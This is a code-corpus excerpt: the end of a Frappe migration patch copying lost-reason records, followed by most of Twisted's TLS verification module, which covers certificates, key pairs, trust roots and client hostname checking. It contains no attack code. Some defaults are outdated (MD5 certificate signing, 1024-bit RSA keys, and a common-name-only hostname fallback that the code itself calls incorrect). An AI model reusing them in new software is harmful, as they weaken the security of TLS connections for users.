if frappe.db.exists("DocType", "Lost Reason Detail"):
frappe.reload_doc("crm", "doctype", "opportunity_lost_reason")
frappe.reload_doc("crm", "doctype", "opportunity_lost_reason_detail")
frappe.reload_doc("setup", "doctype", "quotation_lost_reason_detail")
frappe.db.sql("""INSERT INTO `tabOpportunity Lost Reason Detail` SELECT * FROM `tabLost Reason Detail` WHERE `parenttype` = 'Opportunity'""")
frappe.db.sql("""INSERT INTO `tabQuotation Lost Reason Detail` SELECT * FROM `tabLost Reason Detail` WHERE `parenttype` = 'Quotation'""")
frappe.db.sql("""INSERT INTO `tabQuotation Lost Reason` (`name`, `creation`, `modified`, `modified_by`, `owner`, `docstatus`, `parent`, `parentfield`, `parenttype`, `idx`, `_comments`, `_assign`, `_user_tags`, `_liked_by`, `order_lost_reason`)
SELECT o.`name`, o.`creation`, o.`modified`, o.`modified_by`, o.`owner`, o.`docstatus`, o.`parent`, o.`parentfield`, o.`parenttype`, o.`idx`, o.`_comments`, o.`_assign`, o.`_user_tags`, o.`_liked_by`, o.`lost_reason`
FROM `tabOpportunity Lost Reason` o LEFT JOIN `tabQuotation Lost Reason` q ON q.name = o.name WHERE q.name IS NULL""")
frappe.delete_doc("DocType", "Lost Reason Detail") | gpl-3.0 |
msmolens/VTK | ThirdParty/Twisted/twisted/internet/_sslverify.py | 23 | 58378 | # -*- test-case-name: twisted.test.test_sslverify -*-
# Copyright (c) 2005 Divmod, Inc.
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
from __future__ import division, absolute_import
import itertools
import warnings
from hashlib import md5
from OpenSSL import SSL, crypto, version
try:
from OpenSSL.SSL import SSL_CB_HANDSHAKE_DONE, SSL_CB_HANDSHAKE_START
except ImportError:
SSL_CB_HANDSHAKE_START = 0x10
SSL_CB_HANDSHAKE_DONE = 0x20
from twisted.python import log
def _cantSetHostnameIndication(connection, hostname):
"""
The option to set SNI is not available, so do nothing.
@param connection: the connection
@type connection: L{OpenSSL.SSL.Connection}
@param hostname: the server's host name
@type: hostname: L{bytes}
"""
def _setHostNameIndication(connection, hostname):
"""
Set the server name indication on the given client connection to the given
value.
@param connection: the connection
@type connection: L{OpenSSL.SSL.Connection}
@param hostname: the server's host name
@type: hostname: L{bytes}
"""
connection.set_tlsext_host_name(hostname)
if getattr(SSL.Connection, "set_tlsext_host_name", None) is None:
_maybeSetHostNameIndication = _cantSetHostnameIndication
else:
_maybeSetHostNameIndication = _setHostNameIndication
class SimpleVerificationError(Exception):
"""
Not a very useful verification error.
"""
def _idnaBytes(text):
"""
Convert some text typed by a human into some ASCII bytes.
This is provided to allow us to use the U{partially-broken IDNA
implementation in the standard library <http://bugs.python.org/issue17305>}
if the more-correct U{idna <https://pypi.python.org/pypi/idna>} package is
not available; C{service_identity} is somewhat stricter about this.
@param text: A domain name, hopefully.
@type text: L{unicode}
@return: The domain name's IDNA representation, encoded as bytes.
@rtype: L{bytes}
"""
try:
import idna
except ImportError:
return text.encode("idna")
else:
return idna.encode(text).encode("ascii")
def _idnaText(octets):
"""
Convert some IDNA-encoded octets into some human-readable text.
Currently only used by the tests.
@param octets: Some bytes representing a hostname.
@type octets: L{bytes}
@return: A human-readable domain name.
@rtype: L{unicode}
"""
try:
import idna
except ImportError:
return octets.decode("idna")
else:
return idna.decode(octets)
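# Illustrative sketch: an internationalized hostname round-tripped through
# the two IDNA helpers above. The domain is an arbitrary example value.
def _exampleIdnaRoundTrip():
    encoded = _idnaBytes(u"m\xfcnchen.example")
    # encoded holds the ACE form, e.g. b'xn--mnchen-3ya.example'
    return _idnaText(encoded)  # back to u'm\xfcnchen.example'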
def simpleVerifyHostname(connection, hostname):
"""
Check only the common name in the certificate presented by the peer and
only for an exact match.
This is to provide I{something} in the way of hostname verification to
    users who haven't upgraded past pyOpenSSL 0.12 or installed
C{service_identity}. This check is overly strict, relies on a deprecated
TLS feature (you're supposed to ignore the commonName if the
subjectAlternativeName extensions are present, I believe), and lots of
valid certificates will fail.
    @param connection: the OpenSSL connection to verify.
@type connection: L{OpenSSL.SSL.Connection}
@param hostname: The hostname expected by the user.
@type hostname: L{unicode}
@raise twisted.internet.ssl.VerificationError: if the common name and
hostname don't match.
"""
commonName = connection.get_peer_certificate().get_subject().commonName
if commonName != hostname:
raise SimpleVerificationError(repr(commonName) + "!=" +
repr(hostname))
def _selectVerifyImplementation():
"""
U{service_identity <https://pypi.python.org/pypi/service_identity>}
requires pyOpenSSL 0.12 or better but our dependency is still back at 0.10.
Determine if pyOpenSSL has the requisite feature, and whether
C{service_identity} is installed. If so, use it. If not, use simplistic
and incorrect checking as implemented in L{simpleVerifyHostname}.
@return: 2-tuple of (C{verify_hostname}, C{VerificationError})
@rtype: L{tuple}
"""
whatsWrong = (
"Without the service_identity module and a recent enough pyOpenSSL to"
"support it, Twisted can perform only rudimentary TLS client hostname"
"verification. Many valid certificate/hostname mappings may be "
"rejected."
)
if hasattr(crypto.X509, "get_extension_count"):
try:
from service_identity import VerificationError
from service_identity.pyopenssl import verify_hostname
return verify_hostname, VerificationError
except ImportError:
warnings.warn(
"You do not have the service_identity module installed. "
"Please install it from "
"<https://pypi.python.org/pypi/service_identity>. "
+ whatsWrong,
UserWarning,
stacklevel=2
)
else:
warnings.warn(
"Your version of pyOpenSSL, {0}, is out of date. "
"Please upgrade to at least 0.12 and install service_identity "
"from <https://pypi.python.org/pypi/service_identity>. "
.format(version.__version__) + whatsWrong,
UserWarning,
stacklevel=2
)
return simpleVerifyHostname, SimpleVerificationError
verifyHostname, VerificationError = _selectVerifyImplementation()
from zope.interface import Interface, implementer
from twisted.internet.defer import Deferred
from twisted.internet.error import VerifyError, CertificateError
from twisted.internet.interfaces import (
IAcceptableCiphers, ICipher, IOpenSSLClientConnectionCreator
)
from twisted.python import reflect, util
from twisted.python.deprecate import _mutuallyExclusiveArguments
from twisted.python.compat import nativeString, networkString, unicode
from twisted.python.failure import Failure
from twisted.python.util import FancyEqMixin
def _sessionCounter(counter=itertools.count()):
"""
Private - shared between all OpenSSLCertificateOptions, counts up to
provide a unique session id for each context.
"""
return next(counter)
_x509names = {
'CN': 'commonName',
'commonName': 'commonName',
'O': 'organizationName',
'organizationName': 'organizationName',
'OU': 'organizationalUnitName',
'organizationalUnitName': 'organizationalUnitName',
'L': 'localityName',
'localityName': 'localityName',
'ST': 'stateOrProvinceName',
'stateOrProvinceName': 'stateOrProvinceName',
'C': 'countryName',
'countryName': 'countryName',
'emailAddress': 'emailAddress'}
class DistinguishedName(dict):
"""
Identify and describe an entity.
Distinguished names are used to provide a minimal amount of identifying
information about a certificate issuer or subject. They are commonly
created with one or more of the following fields::
commonName (CN)
organizationName (O)
organizationalUnitName (OU)
localityName (L)
stateOrProvinceName (ST)
countryName (C)
emailAddress
A L{DistinguishedName} should be constructed using keyword arguments whose
keys can be any of the field names above (as a native string), and the
values are either Unicode text which is encodable to ASCII, or C{bytes}
limited to the ASCII subset. Any fields passed to the constructor will be
    set as attributes, accessible using both their extended name and their
shortened acronym. The attribute values will be the ASCII-encoded
bytes. For example::
>>> dn = DistinguishedName(commonName=b'www.example.com',
C='US')
>>> dn.C
b'US'
>>> dn.countryName
b'US'
>>> hasattr(dn, "organizationName")
False
L{DistinguishedName} instances can also be used as dictionaries; the keys
    are the extended names of the fields::
>>> dn.keys()
['countryName', 'commonName']
>>> dn['countryName']
b'US'
"""
__slots__ = ()
def __init__(self, **kw):
for k, v in kw.items():
setattr(self, k, v)
def _copyFrom(self, x509name):
for name in _x509names:
value = getattr(x509name, name, None)
if value is not None:
setattr(self, name, value)
def _copyInto(self, x509name):
for k, v in self.items():
setattr(x509name, k, nativeString(v))
def __repr__(self):
return '<DN %s>' % (dict.__repr__(self)[1:-1])
def __getattr__(self, attr):
try:
return self[_x509names[attr]]
except KeyError:
raise AttributeError(attr)
def __setattr__(self, attr, value):
if attr not in _x509names:
raise AttributeError("%s is not a valid OpenSSL X509 name field" % (attr,))
realAttr = _x509names[attr]
if not isinstance(value, bytes):
value = value.encode("ascii")
self[realAttr] = value
def inspect(self):
"""
Return a multi-line, human-readable representation of this DN.
@rtype: C{str}
"""
l = []
lablen = 0
def uniqueValues(mapping):
return set(mapping.values())
for k in sorted(uniqueValues(_x509names)):
label = util.nameToLabel(k)
lablen = max(len(label), lablen)
v = getattr(self, k, None)
if v is not None:
l.append((label, nativeString(v)))
lablen += 2
for n, (label, attr) in enumerate(l):
l[n] = (label.rjust(lablen)+': '+ attr)
return '\n'.join(l)
DN = DistinguishedName
class CertBase:
"""
Base class for public (certificate only) and private (certificate + key
pair) certificates.
@ivar original: The underlying OpenSSL certificate object.
@type original: L{OpenSSL.crypto.X509}
"""
def __init__(self, original):
self.original = original
def _copyName(self, suffix):
dn = DistinguishedName()
dn._copyFrom(getattr(self.original, 'get_'+suffix)())
return dn
def getSubject(self):
"""
Retrieve the subject of this certificate.
@return: A copy of the subject of this certificate.
@rtype: L{DistinguishedName}
"""
return self._copyName('subject')
def __conform__(self, interface):
"""
Convert this L{CertBase} into a provider of the given interface.
@param interface: The interface to conform to.
@type interface: L{Interface}
@return: an L{IOpenSSLTrustRoot} provider or L{NotImplemented}
@rtype: C{interface} or L{NotImplemented}
"""
if interface is IOpenSSLTrustRoot:
return OpenSSLCertificateAuthorities([self.original])
return NotImplemented
def _handleattrhelper(Class, transport, methodName):
"""
(private) Helper for L{Certificate.peerFromTransport} and
L{Certificate.hostFromTransport} which checks for incompatible handle types
and null certificates and raises the appropriate exception or returns the
appropriate certificate object.
"""
method = getattr(transport.getHandle(),
"get_%s_certificate" % (methodName,), None)
if method is None:
raise CertificateError(
"non-TLS transport %r did not have %s certificate" % (transport, methodName))
cert = method()
if cert is None:
raise CertificateError(
"TLS transport %r did not have %s certificate" % (transport, methodName))
return Class(cert)
class Certificate(CertBase):
"""
An x509 certificate.
"""
def __repr__(self):
return '<%s Subject=%s Issuer=%s>' % (self.__class__.__name__,
self.getSubject().commonName,
self.getIssuer().commonName)
def __eq__(self, other):
if isinstance(other, Certificate):
return self.dump() == other.dump()
return False
def __ne__(self, other):
return not self.__eq__(other)
def load(Class, requestData, format=crypto.FILETYPE_ASN1, args=()):
"""
Load a certificate from an ASN.1- or PEM-format string.
@rtype: C{Class}
"""
return Class(crypto.load_certificate(format, requestData), *args)
load = classmethod(load)
_load = load
def dumpPEM(self):
"""
Dump this certificate to a PEM-format data string.
@rtype: C{str}
"""
return self.dump(crypto.FILETYPE_PEM)
def loadPEM(Class, data):
"""
Load a certificate from a PEM-format data string.
@rtype: C{Class}
"""
return Class.load(data, crypto.FILETYPE_PEM)
loadPEM = classmethod(loadPEM)
def peerFromTransport(Class, transport):
"""
Get the certificate for the remote end of the given transport.
        @param transport: an L{ISystemHandle} provider
        @type transport: L{ISystemHandle}
@rtype: C{Class}
@raise: L{CertificateError}, if the given transport does not have a peer
certificate.
"""
return _handleattrhelper(Class, transport, 'peer')
peerFromTransport = classmethod(peerFromTransport)
def hostFromTransport(Class, transport):
"""
Get the certificate for the local end of the given transport.
        @param transport: an L{ISystemHandle} provider; the transport whose
            host certificate we will retrieve.
@rtype: C{Class}
@raise: L{CertificateError}, if the given transport does not have a host
certificate.
"""
return _handleattrhelper(Class, transport, 'host')
hostFromTransport = classmethod(hostFromTransport)
def getPublicKey(self):
"""
Get the public key for this certificate.
@rtype: L{PublicKey}
"""
return PublicKey(self.original.get_pubkey())
def dump(self, format=crypto.FILETYPE_ASN1):
return crypto.dump_certificate(format, self.original)
def serialNumber(self):
"""
Retrieve the serial number of this certificate.
@rtype: C{int}
"""
return self.original.get_serial_number()
def digest(self, method='md5'):
"""
Return a digest hash of this certificate using the specified hash
algorithm.
@param method: One of C{'md5'} or C{'sha'}.
@rtype: C{str}
"""
return self.original.digest(method)
def _inspect(self):
return '\n'.join(['Certificate For Subject:',
self.getSubject().inspect(),
'\nIssuer:',
self.getIssuer().inspect(),
'\nSerial Number: %d' % self.serialNumber(),
'Digest: %s' % nativeString(self.digest())])
def inspect(self):
"""
Return a multi-line, human-readable representation of this
Certificate, including information about the subject, issuer, and
public key.
"""
return '\n'.join((self._inspect(), self.getPublicKey().inspect()))
def getIssuer(self):
"""
Retrieve the issuer of this certificate.
@rtype: L{DistinguishedName}
@return: A copy of the issuer of this certificate.
"""
return self._copyName('issuer')
def options(self, *authorities):
raise NotImplementedError('Possible, but doubtful we need this yet')
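# Illustrative usage sketch: load a PEM-encoded certificate and read back a
# few of its attributes. ``pemData`` is assumed to hold the PEM text of a
# certificate whose subject and issuer carry a commonName.
def _exampleLoadCertificate(pemData):
    cert = Certificate.loadPEM(pemData)
    return (cert.getSubject().commonName,
            cert.getIssuer().commonName,
            cert.serialNumber())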
class CertificateRequest(CertBase):
"""
An x509 certificate request.
Certificate requests are given to certificate authorities to be signed and
returned resulting in an actual certificate.
"""
def load(Class, requestData, requestFormat=crypto.FILETYPE_ASN1):
req = crypto.load_certificate_request(requestFormat, requestData)
dn = DistinguishedName()
dn._copyFrom(req.get_subject())
if not req.verify(req.get_pubkey()):
raise VerifyError("Can't verify that request for %r is self-signed." % (dn,))
return Class(req)
load = classmethod(load)
def dump(self, format=crypto.FILETYPE_ASN1):
return crypto.dump_certificate_request(format, self.original)
class PrivateCertificate(Certificate):
"""
An x509 certificate and private key.
"""
def __repr__(self):
return Certificate.__repr__(self) + ' with ' + repr(self.privateKey)
def _setPrivateKey(self, privateKey):
if not privateKey.matches(self.getPublicKey()):
raise VerifyError(
"Certificate public and private keys do not match.")
self.privateKey = privateKey
return self
def newCertificate(self, newCertData, format=crypto.FILETYPE_ASN1):
"""
Create a new L{PrivateCertificate} from the given certificate data and
this instance's private key.
"""
return self.load(newCertData, self.privateKey, format)
def load(Class, data, privateKey, format=crypto.FILETYPE_ASN1):
return Class._load(data, format)._setPrivateKey(privateKey)
load = classmethod(load)
def inspect(self):
return '\n'.join([Certificate._inspect(self),
self.privateKey.inspect()])
def dumpPEM(self):
"""
Dump both public and private parts of a private certificate to
PEM-format data.
"""
return self.dump(crypto.FILETYPE_PEM) + self.privateKey.dump(crypto.FILETYPE_PEM)
def loadPEM(Class, data):
"""
Load both private and public parts of a private certificate from a
chunk of PEM-format data.
"""
return Class.load(data, KeyPair.load(data, crypto.FILETYPE_PEM),
crypto.FILETYPE_PEM)
loadPEM = classmethod(loadPEM)
def fromCertificateAndKeyPair(Class, certificateInstance, privateKey):
privcert = Class(certificateInstance.original)
return privcert._setPrivateKey(privateKey)
fromCertificateAndKeyPair = classmethod(fromCertificateAndKeyPair)
def options(self, *authorities):
"""
Create a context factory using this L{PrivateCertificate}'s certificate
and private key.
        @param authorities: A list of L{Certificate} objects
@return: A context factory.
@rtype: L{CertificateOptions <twisted.internet.ssl.CertificateOptions>}
"""
options = dict(privateKey=self.privateKey.original,
certificate=self.original)
if authorities:
options.update(dict(trustRoot=OpenSSLCertificateAuthorities(
[auth.original for auth in authorities]
)))
return OpenSSLCertificateOptions(**options)
def certificateRequest(self, format=crypto.FILETYPE_ASN1,
digestAlgorithm='md5'):
return self.privateKey.certificateRequest(
self.getSubject(),
format,
digestAlgorithm)
def signCertificateRequest(self,
requestData,
verifyDNCallback,
serialNumber,
requestFormat=crypto.FILETYPE_ASN1,
certificateFormat=crypto.FILETYPE_ASN1):
issuer = self.getSubject()
return self.privateKey.signCertificateRequest(
issuer,
requestData,
verifyDNCallback,
serialNumber,
requestFormat,
certificateFormat)
def signRequestObject(self, certificateRequest, serialNumber,
secondsToExpiry=60 * 60 * 24 * 365, # One year
digestAlgorithm='md5'):
return self.privateKey.signRequestObject(self.getSubject(),
certificateRequest,
serialNumber,
secondsToExpiry,
digestAlgorithm)
class PublicKey:
def __init__(self, osslpkey):
self.original = osslpkey
req1 = crypto.X509Req()
req1.set_pubkey(osslpkey)
self._emptyReq = crypto.dump_certificate_request(crypto.FILETYPE_ASN1, req1)
def matches(self, otherKey):
return self._emptyReq == otherKey._emptyReq
# XXX This could be a useful method, but sometimes it triggers a segfault,
# so we'll steer clear for now.
# def verifyCertificate(self, certificate):
# """
# returns None, or raises a VerifyError exception if the certificate
# could not be verified.
# """
# if not certificate.original.verify(self.original):
# raise VerifyError("We didn't sign that certificate.")
def __repr__(self):
return '<%s %s>' % (self.__class__.__name__, self.keyHash())
def keyHash(self):
"""
MD5 hex digest of signature on an empty certificate request with this
key.
"""
return md5(self._emptyReq).hexdigest()
def inspect(self):
return 'Public Key with Hash: %s' % (self.keyHash(),)
class KeyPair(PublicKey):
def load(Class, data, format=crypto.FILETYPE_ASN1):
return Class(crypto.load_privatekey(format, data))
load = classmethod(load)
def dump(self, format=crypto.FILETYPE_ASN1):
return crypto.dump_privatekey(format, self.original)
def __getstate__(self):
return self.dump()
def __setstate__(self, state):
self.__init__(crypto.load_privatekey(crypto.FILETYPE_ASN1, state))
def inspect(self):
t = self.original.type()
if t == crypto.TYPE_RSA:
ts = 'RSA'
elif t == crypto.TYPE_DSA:
ts = 'DSA'
else:
ts = '(Unknown Type!)'
L = (self.original.bits(), ts, self.keyHash())
return '%s-bit %s Key Pair with Hash: %s' % L
def generate(Class, kind=crypto.TYPE_RSA, size=1024):
pkey = crypto.PKey()
pkey.generate_key(kind, size)
return Class(pkey)
def newCertificate(self, newCertData, format=crypto.FILETYPE_ASN1):
return PrivateCertificate.load(newCertData, self, format)
generate = classmethod(generate)
def requestObject(self, distinguishedName, digestAlgorithm='md5'):
req = crypto.X509Req()
req.set_pubkey(self.original)
distinguishedName._copyInto(req.get_subject())
req.sign(self.original, digestAlgorithm)
return CertificateRequest(req)
def certificateRequest(self, distinguishedName,
format=crypto.FILETYPE_ASN1,
digestAlgorithm='md5'):
"""Create a certificate request signed with this key.
@return: a string, formatted according to the 'format' argument.
"""
return self.requestObject(distinguishedName, digestAlgorithm).dump(format)
def signCertificateRequest(self,
issuerDistinguishedName,
requestData,
verifyDNCallback,
serialNumber,
requestFormat=crypto.FILETYPE_ASN1,
certificateFormat=crypto.FILETYPE_ASN1,
secondsToExpiry=60 * 60 * 24 * 365, # One year
digestAlgorithm='md5'):
"""
Given a blob of certificate request data and a certificate authority's
DistinguishedName, return a blob of signed certificate data.
If verifyDNCallback returns a Deferred, I will return a Deferred which
fires the data when that Deferred has completed.
"""
hlreq = CertificateRequest.load(requestData, requestFormat)
dn = hlreq.getSubject()
vval = verifyDNCallback(dn)
def verified(value):
if not value:
raise VerifyError("DN callback %r rejected request DN %r" % (verifyDNCallback, dn))
return self.signRequestObject(issuerDistinguishedName, hlreq,
serialNumber, secondsToExpiry, digestAlgorithm).dump(certificateFormat)
if isinstance(vval, Deferred):
return vval.addCallback(verified)
else:
return verified(vval)
def signRequestObject(self,
issuerDistinguishedName,
requestObject,
serialNumber,
secondsToExpiry=60 * 60 * 24 * 365, # One year
digestAlgorithm='md5'):
"""
Sign a CertificateRequest instance, returning a Certificate instance.
"""
req = requestObject.original
cert = crypto.X509()
issuerDistinguishedName._copyInto(cert.get_issuer())
cert.set_subject(req.get_subject())
cert.set_pubkey(req.get_pubkey())
cert.gmtime_adj_notBefore(0)
cert.gmtime_adj_notAfter(secondsToExpiry)
cert.set_serial_number(serialNumber)
cert.sign(self.original, digestAlgorithm)
return Certificate(cert)
def selfSignedCert(self, serialNumber, **kw):
dn = DN(**kw)
return PrivateCertificate.fromCertificateAndKeyPair(
self.signRequestObject(dn, self.requestObject(dn), serialNumber),
self)
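# Illustrative usage sketch: generate a fresh RSA key pair and wrap it in a
# self-signed certificate. The serial number and subject fields are
# arbitrary example values.
def _exampleSelfSignedCertificate():
    keyPair = KeyPair.generate(crypto.TYPE_RSA, size=2048)
    return keyPair.selfSignedCert(serialNumber=1,
                                  CN=u"localhost", O=u"Example Org")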
class IOpenSSLTrustRoot(Interface):
"""
Trust settings for an OpenSSL context.
Note that this interface's methods are private, so things outside of
Twisted shouldn't implement it.
"""
def _addCACertsToContext(context):
"""
Add certificate-authority certificates to an SSL context whose
connections should trust those authorities.
@param context: An SSL context for a connection which should be
verified by some certificate authority.
@type context: L{OpenSSL.SSL.Context}
@return: L{None}
"""
@implementer(IOpenSSLTrustRoot)
class OpenSSLCertificateAuthorities(object):
"""
Trust an explicitly specified set of certificates, represented by a list of
L{OpenSSL.crypto.X509} objects.
"""
def __init__(self, caCerts):
"""
@param caCerts: The certificate authorities to trust when using this
object as a C{trustRoot} for L{OpenSSLCertificateOptions}.
@type caCerts: L{list} of L{OpenSSL.crypto.X509}
"""
self._caCerts = caCerts
def _addCACertsToContext(self, context):
store = context.get_cert_store()
for cert in self._caCerts:
store.add_cert(cert)
@implementer(IOpenSSLTrustRoot)
class OpenSSLDefaultPaths(object):
"""
Trust the set of default verify paths that OpenSSL was built with, as
specified by U{SSL_CTX_set_default_verify_paths
<https://www.openssl.org/docs/ssl/SSL_CTX_load_verify_locations.html>}.
"""
def _addCACertsToContext(self, context):
context.set_default_verify_paths()
def platformTrust():
"""
Attempt to discover a set of trusted certificate authority certificates
(or, in other words: trust roots, or root certificates) whose trust is
managed and updated by tools outside of Twisted.
If you are writing any client-side TLS code with Twisted, you should use
this as the C{trustRoot} argument to L{CertificateOptions
<twisted.internet.ssl.CertificateOptions>}.
The result of this function should be like the up-to-date list of
certificates in a web browser. When developing code that uses
C{platformTrust}, you can think of it that way. However, the choice of
which certificate authorities to trust is never Twisted's responsibility.
Unless you're writing a very unusual application or library, it's not your
code's responsibility either. The user may use platform-specific tools for
defining which server certificates should be trusted by programs using TLS.
The purpose of using this API is to respect that decision as much as
possible.
This should be a set of trust settings most appropriate for I{client} TLS
connections; i.e. those which need to verify a server's authenticity. You
should probably use this by default for any client TLS connection that you
create. For servers, however, client certificates are typically not
verified; or, if they are, their verification will depend on a custom,
application-specific certificate authority.
@since: 14.0
@note: Currently, L{platformTrust} depends entirely upon your OpenSSL build
supporting a set of "L{default verify paths <OpenSSLDefaultPaths>}"
which correspond to certificate authority trust roots. Unfortunately,
whether this is true of your system is both outside of Twisted's
control and difficult (if not impossible) for Twisted to detect
automatically.
Nevertheless, this ought to work as desired by default on:
- Ubuntu Linux machines with the U{ca-certificates
<https://launchpad.net/ubuntu/+source/ca-certificates>} package
installed,
- Mac OS X when using the system-installed version of OpenSSL (i.e.
I{not} one installed via MacPorts or Homebrew),
- any build of OpenSSL which has had certificate authority
certificates installed into its default verify paths (by default,
C{/usr/local/ssl/certs} if you've built your own OpenSSL), or
- any process where the C{SSL_CERT_FILE} environment variable is
set to the path of a file containing your desired CA certificates
bundle.
Hopefully soon, this API will be updated to use more sophisticated
trust-root discovery mechanisms. Until then, you can follow tickets in
the Twisted tracker for progress on this implementation on U{Microsoft
Windows <https://twistedmatrix.com/trac/ticket/6371>}, U{Mac OS X
<https://twistedmatrix.com/trac/ticket/6372>}, and U{a fallback for
other platforms which do not have native trust management tools
<https://twistedmatrix.com/trac/ticket/6934>}.
@return: an appropriate trust settings object for your platform.
@rtype: L{IOpenSSLTrustRoot}
@raise NotImplementedError: if this platform is not yet supported by
Twisted. At present, only OpenSSL is supported.
"""
return OpenSSLDefaultPaths()
def _tolerateErrors(wrapped):
"""
Wrap up an C{info_callback} for pyOpenSSL so that if something goes wrong
the error is immediately logged and the connection is dropped if possible.
This wrapper exists because some versions of pyOpenSSL don't handle errors
from callbacks at I{all}, and those which do write tracebacks directly to
stderr rather than to a supplied logging system. This reports unexpected
errors to the Twisted logging system.
Also, this terminates the connection immediately if possible because if
you've got bugs in your verification logic it's much safer to just give up.
@param wrapped: A valid C{info_callback} for pyOpenSSL.
@type wrapped: L{callable}
@return: A valid C{info_callback} for pyOpenSSL that handles any errors in
C{wrapped}.
@rtype: L{callable}
"""
def infoCallback(connection, where, ret):
try:
return wrapped(connection, where, ret)
except:
f = Failure()
log.err(f, "Error during info_callback")
connection.get_app_data().failVerification(f)
return infoCallback
@implementer(IOpenSSLClientConnectionCreator)
class ClientTLSOptions(object):
"""
Client creator for TLS.
Private implementation type (not exposed to applications) for public
L{optionsForClientTLS} API.
@ivar _ctx: The context to use for new connections.
@type _ctx: L{SSL.Context}
@ivar _hostname: The hostname to verify, as specified by the application,
as some human-readable text.
@type _hostname: L{unicode}
@ivar _hostnameBytes: The hostname to verify, decoded into IDNA-encoded
bytes. This is passed to APIs which think that hostnames are bytes,
such as OpenSSL's SNI implementation.
@type _hostnameBytes: L{bytes}
@ivar _hostnameASCII: The hostname, as transcoded into IDNA ASCII-range
unicode code points. This is pre-transcoded because the
C{service_identity} package is rather strict about requiring the
C{idna} package from PyPI for internationalized domain names, rather
than working with Python's built-in (but sometimes broken) IDNA
encoding. ASCII values, however, will always work.
@type _hostnameASCII: L{unicode}
"""
def __init__(self, hostname, ctx):
"""
Initialize L{ClientTLSOptions}.
@param hostname: The hostname to verify as input by a human.
@type hostname: L{unicode}
@param ctx: an L{SSL.Context} to use for new connections.
@type ctx: L{SSL.Context}.
"""
self._ctx = ctx
self._hostname = hostname
self._hostnameBytes = _idnaBytes(hostname)
self._hostnameASCII = self._hostnameBytes.decode("ascii")
ctx.set_info_callback(
_tolerateErrors(self._identityVerifyingInfoCallback)
)
def clientConnectionForTLS(self, tlsProtocol):
"""
Create a TLS connection for a client.
@note: This will call C{set_app_data} on its connection. If you're
delegating to this implementation of this method, don't ever call
C{set_app_data} or C{set_info_callback} on the returned connection,
or you'll break the implementation of various features of this
class.
@param tlsProtocol: the TLS protocol initiating the connection.
@type tlsProtocol: L{twisted.protocols.tls.TLSMemoryBIOProtocol}
@return: the configured client connection.
@rtype: L{OpenSSL.SSL.Connection}
"""
context = self._ctx
connection = SSL.Connection(context, None)
connection.set_app_data(tlsProtocol)
return connection
def _identityVerifyingInfoCallback(self, connection, where, ret):
"""
U{info_callback
<http://pythonhosted.org/pyOpenSSL/api/ssl.html#OpenSSL.SSL.Context.set_info_callback>
} for pyOpenSSL that verifies the hostname in the presented certificate
matches the one passed to this L{ClientTLSOptions}.
@param connection: the connection which is handshaking.
@type connection: L{OpenSSL.SSL.Connection}
@param where: flags indicating progress through a TLS handshake.
@type where: L{int}
@param ret: ignored
@type ret: ignored
"""
if where & SSL_CB_HANDSHAKE_START:
_maybeSetHostNameIndication(connection, self._hostnameBytes)
elif where & SSL_CB_HANDSHAKE_DONE:
try:
verifyHostname(connection, self._hostnameASCII)
except VerificationError:
f = Failure()
transport = connection.get_app_data()
transport.failVerification(f)
def optionsForClientTLS(hostname, trustRoot=None, clientCertificate=None,
**kw):
"""
Create a L{client connection creator <IOpenSSLClientConnectionCreator>} for
use with APIs such as L{SSL4ClientEndpoint
<twisted.internet.endpoints.SSL4ClientEndpoint>}, L{connectSSL
<twisted.internet.interfaces.IReactorSSL.connectSSL>}, and L{startTLS
<twisted.internet.interfaces.ITLSTransport.startTLS>}.
@since: 14.0
@param hostname: The expected name of the remote host. This serves two
purposes: first, and most importantly, it verifies that the certificate
received from the server correctly identifies the specified hostname.
The second purpose is (if the local C{pyOpenSSL} supports it) to use
the U{Server Name Indication extension
<https://en.wikipedia.org/wiki/Server_Name_Indication>} to indicate to
the server which certificate should be used.
@type hostname: L{unicode}
@param trustRoot: Specification of trust requirements of peers. This may
be a L{Certificate} or the result of L{platformTrust}. By default it
is L{platformTrust} and you probably shouldn't adjust it unless you
really know what you're doing. Be aware that clients using this
interface I{must} verify the server; you cannot explicitly pass C{None}
since that just means to use L{platformTrust}.
@type trustRoot: L{IOpenSSLTrustRoot}
@param clientCertificate: The certificate and private key that the client
will use to authenticate to the server. If unspecified, the client
will not authenticate.
@type clientCertificate: L{PrivateCertificate}
@param extraCertificateOptions: keyword-only argument; this is a dictionary
of additional keyword arguments to be presented to
L{CertificateOptions}. Please avoid using this unless you absolutely
        need to; any time you need to pass an option here, that indicates a
        bug in this interface.
@type extraCertificateOptions: L{dict}
@param kw: (Backwards compatibility hack to allow keyword-only arguments on
Python 2. Please ignore; arbitrary keyword arguments will be errors.)
@type kw: L{dict}
@return: A client connection creator.
@rtype: L{IOpenSSLClientConnectionCreator}
"""
extraCertificateOptions = kw.pop('extraCertificateOptions', None) or {}
if trustRoot is None:
trustRoot = platformTrust()
if kw:
raise TypeError(
"optionsForClientTLS() got an unexpected keyword argument"
" '{arg}'".format(
arg=kw.popitem()[0]
)
)
if not isinstance(hostname, unicode):
raise TypeError(
"optionsForClientTLS requires text for host names, not "
+ hostname.__class__.__name__
)
if clientCertificate:
extraCertificateOptions.update(
privateKey=clientCertificate.privateKey.original,
certificate=clientCertificate.original
)
certificateOptions = OpenSSLCertificateOptions(
trustRoot=trustRoot,
**extraCertificateOptions
)
return ClientTLSOptions(hostname, certificateOptions.getContext())
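# Illustrative sketch (not part of the upstream module): one way the creator
# returned by optionsForClientTLS is typically combined with an endpoint, as
# its docstring suggests.  The host name and port below are placeholders.
def _exampleOptionsForClientTLSUsage(reactor):
    """
    Build a TLS client endpoint for example.com:443 using the platform trust
    store.  Purely illustrative; never called by this module.
    """
    from twisted.internet.endpoints import SSL4ClientEndpoint
    contextFactory = optionsForClientTLS(u"example.com")
    return SSL4ClientEndpoint(reactor, "example.com", 443, contextFactory)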
class OpenSSLCertificateOptions(object):
"""
A L{CertificateOptions <twisted.internet.ssl.CertificateOptions>} specifies
the security properties for a client or server TLS connection used with
OpenSSL.
@ivar _options: Any option flags to set on the L{OpenSSL.SSL.Context}
object that will be created.
@type _options: L{int}
@ivar _cipherString: An OpenSSL-specific cipher string.
@type _cipherString: L{unicode}
"""
# Factory for creating contexts. Configurable for testability.
_contextFactory = SSL.Context
_context = None
# Some option constants may not be exposed by PyOpenSSL yet.
_OP_ALL = getattr(SSL, 'OP_ALL', 0x0000FFFF)
_OP_NO_TICKET = getattr(SSL, 'OP_NO_TICKET', 0x00004000)
